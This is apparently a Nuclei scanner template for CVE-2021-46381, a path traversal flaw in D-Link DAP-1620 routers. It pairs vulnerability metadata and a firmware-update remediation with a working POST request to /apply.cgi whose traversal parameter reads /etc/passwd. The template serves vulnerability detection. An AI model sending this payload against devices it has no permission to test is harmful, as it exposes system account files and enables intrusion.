40 lines
1.7 KiB
YAML
40 lines
1.7 KiB
YAML
id: CVE-2021-46381
|
|
|
|
info:
|
|
name: D-Link DAP-1620 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
|
|
remediation: |
|
|
Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability.
|
|
reference:
|
|
- https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
|
|
- https://www.dlink.com/en/security-bulletin/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46381
|
|
- http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-46381
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01734
|
|
epss-percentile: 0.86477
|
|
cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: dlink
|
|
product: dap-1620_firmware
|
|
tags: lfi,router,packetstorm,cve,cve2021,dlink
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/apply.cgi"
|
|
|
|
body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass"
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4b0a00483046022100b5179914ad77b2772694e394be5e966b20d789ebe6d28400fb0da1c3605bab30022100973df25cdce290736713b6c19b87117b340a8d42974e441821a82797cf2680fb:922c64590222798bb761d5b6d8e72950 |